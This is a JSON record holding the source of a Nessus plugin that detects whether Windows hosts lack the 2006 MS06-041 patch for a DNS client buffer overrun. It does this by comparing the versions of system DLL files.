"nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3440", "CVE-2006-3441"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS06-041.NASL", "href": "https://www.tenable.com/plugins/nessus/22183", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22183);\n script_version(\"1.35\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2006-3440\", \"CVE-2006-3441\");\n script_bugtraq_id(19319, 19404);\n script_xref(name:\"CERT\", value:\"908276\");\n script_xref(name:\"CERT\", value:\"794580\");\n script_xref(name:\"MSFT\", value:\"MS06-041\");\n script_xref(name:\"MSKB\", value:\"920683\");\n\n script_name(english:\"MS06-041: Vulnerability in DNS Resolution Could Allow Remote Code Execution (920683)\");\n script_summary(english:\"Determines the presence of update 920683\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host due to a flaw in the\nDNS client.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is vulnerable to a buffer overrun in the DNS client\nservice that could allow an attacker to execute arbitrary code on the\nremote host with SYSTEM privileges.\n\nTo exploit this vulnerability, an attacker would need to set up a\nrogue DNS server to reply to the client with a specially crafted\npacket.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-041\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-041';\nkb = '920683';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'1,2', win2003:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Dnsapi.dll\", version:\"5.2.3790.558\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Dnsapi.dll\", version:\"5.2.3790.2745\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Dnsapi.dll\", version:\"5.1.2600.1863\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Dnsapi.dll\", version:\"5.1.2600.2938\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Dnsapi.dll\", version:\"5.0.2195.7100\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Rasadhlp.dll\", version:\"5.2.3790.558\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Rasadhlp.dll\", version:\"5.2.3790.2745\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Rasadhlp.dll\", version:\"5.1.2600.1863\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Rasadhlp.dll\", version:\"5.1.2600.2938\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"Rasadhlp.dll\", version:\"5.0.2195.7098\", dir:\"\\system32\", bulletin:bulletin, kb:kb) )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}